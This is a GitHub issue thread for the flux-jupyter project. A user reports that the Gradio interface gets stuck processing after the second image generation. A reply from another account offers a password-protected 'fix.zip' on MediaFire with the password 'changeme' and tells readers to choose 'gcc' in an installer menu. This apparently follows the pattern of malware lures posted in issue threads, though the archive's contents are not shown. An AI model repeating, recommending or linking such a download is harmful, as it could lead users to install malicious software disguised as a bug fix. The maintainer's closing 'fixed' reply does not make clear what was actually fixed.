### ISSUE TITLE
The gradio one is not working

### ISSUE THREAD

**Issue by Szakbal2001** [camenduru/flux-jupyter#17]
After the second generation it stuck in processing while the image is done.
![Screenshot_2024-08-27-11-40-30-587_com brave browser](https://github.com/user-attachments/assets/99517f53-620b-4339-8f66-a89f8e293932)
![Screenshot_2024-08-27-11-40-51-616_com brave browser](https://github.com/user-attachments/assets/92d85526-daab-4c5e-8b8f-153d6ffe78ec)
![Screenshot_2024-08-27-11-41-07-307_com brave browser](https://github.com/user-attachments/assets/35754cf6-7690-4121-be70-e5ca1b9d38d2)

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by camenduru** [comment]
thanks for the info ❤ fixed
